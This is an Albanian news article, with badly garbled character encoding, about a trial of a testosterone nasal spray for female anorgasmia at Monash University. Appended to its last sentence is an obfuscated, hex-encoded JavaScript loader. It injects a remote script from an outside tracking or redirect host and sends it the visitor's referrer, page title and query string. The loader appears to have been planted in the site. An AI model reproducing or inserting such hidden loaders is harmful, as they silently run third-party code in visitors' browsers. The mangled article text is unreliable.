f.1101004537219_m

Viagra pA�r femrat nA� formA� tA� pikave pA�r hundA�

PA�rjetimi i orgazmA�s A�shtA� i paarritshA�m pothuajse pA�r 30% tA� femrave, por terapia e re, e cila momentalisht A�shtA� nA� fazA�n e testimit, kA�tA� shifA�r do tA� mund ta ndryshonte nA� mA�nyrA� drastike.

Anorgazma, paaftA�sia e femrave pA�r ta pA�rjetuar orgazmA�n A�shtA� njA� ndA�r problemet mA� tA� shpeshta seksuale tek femrat. Edhe pse nga kjo vuajnA� njA� e treta e femrave, momentalisht zgjidhjet e vetme janA� tretmanA�t me psikoterapi dhe terapi seksuale. MirA�po, shkencA�tarA�t nga universiteti Monash nA� Australi, nA� hulumtimet qA� i kishte udhA�hequr profesoresha Susan Davis, testohet efikasiteti i terapisA� pA�r anorgazmA�, e cila bazohet nA� testosterone.

a�?Presim qA� terapia tA� ketA� sukses si njA� lloj i ViagrA�s pA�r femrat. Femrat kA�tA� ilaA� mund ta pA�rdorin vetA�m atA�herA� kur presin marrA�dhA�nie seksualea�?, thotA� Davis. Terapia nA� trup mund tA� pA�rdoret nA� formA�n e pikave pA�r hundA� e qA� ndikimin e fillon dy orA� pas pA�rdorimit.

ShkencA�tarA�t shpresojnA� se do tA� gjejnA� numA�r tA� mjaftueshA�m tA� femrave, nga mosha 18 deri nA� moshA�n 49- vjeA�e, tA� cilat kanA� pA�rjetuar anorgazmA�n dhe do tA� kishin vullnetin tA� marrin pjesA� nA� test. Pos nA� Australi, teste do tA� bA�hen edhe nA� SHBA e nA� Kanada.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}